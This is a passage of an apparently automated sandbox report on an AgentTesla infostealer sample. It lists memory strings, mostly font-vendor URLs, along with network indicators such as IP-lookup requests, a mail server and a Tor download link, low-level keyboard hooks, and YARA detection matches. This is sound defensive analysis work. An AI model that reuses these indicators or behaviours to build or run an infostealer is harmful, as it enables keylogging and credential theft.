Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273916785.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comd
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comd&-c
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comd--
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comdH-u
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comdf
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271209683.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271153816.0000000005A51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comgrita
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comml-Y
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitu
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsiv_-l
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coms-P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265019576.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264911934.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/d
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274806173.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm2
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;-
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H-u
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y001
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_-l
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273210069.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270890643.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273295422.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deeg
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265582317.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
Source: nrQtAokXKaSn.exe, 00000010.00000002.538774344.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539333299.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539499206.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://OPBeIPZ8XbJqLOvY6X.net
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgmail.strictfacilityservices.comaccounts
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Window created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
